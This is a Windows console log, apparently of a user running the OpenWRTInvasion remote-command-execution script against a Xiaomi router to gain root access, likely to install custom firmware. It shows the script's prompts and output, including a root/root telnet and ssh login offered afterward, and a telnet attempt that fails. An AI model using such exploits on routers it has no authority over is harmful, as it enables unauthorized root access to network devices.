|
Microsoft Windows [版本 10.0.19044.1165]
(c) Microsoft Corporation。保留所有权利。
C:\Users\Administrator\Desktop\OpenWRTInvasion-master>pip install requests
Requirement already satisfied: requests in c:\users\administrator\appdata\local\programs\python\python310\lib\site-packages (2.28.1)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\administrator\appdata\local\programs\python\python310\lib\site-packages (from requests) (2022.6.15)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in c:\users\administrator\appdata\local\programs\python\python310\lib\site-packages (from requests) (1.26.11)
Requirement already satisfied: charset-normalizer<3,>=2 in c:\users\administrator\appdata\local\programs\python\python310\lib\site-packages (from requests) (2.1.0)
Requirement already satisfied: idna<4,>=2.5 in c:\users\administrator\appdata\local\programs\python\python310\lib\site-packages (from requests) (3.3)
WARNING: You are using pip version 22.0.4; however, version 22.2.1 is available.
You should consider upgrading via the 'C:\Users\Administrator\AppData\Local\Programs\Python\Python310\python.exe -m pip install --upgrade pip' command.
C:\Users\Administrator\Desktop\OpenWRTInvasion-master>python remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 'miwifi.com']: 192.168.31.1
Enter router admin password: 12345678
There two options to provide the files needed for invasion:
1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`.
2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)
Which option do you prefer? (default: 1)1
****************
router_ip_address: 192.168.31.1
stok: fbc6b2fed93ad48473167b3d236729b5
file provider: local file server
****************
start uploading config file...
start exec command...
local file server is runing on 0.0.0.0:62715. root='script_tools'
done! Now you can connect to the router using several options: (user: root, password: root)
* telnet 192.168.31.1
* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.31.1
* ftp: using a program like cyberduck
C:\Users\Administrator\Desktop\OpenWRTInvasion-master>telnet 192.168.31.1
正在连接192.168.31.1...无法打开到主机的连接。 在端口 23: 连接失败
|
|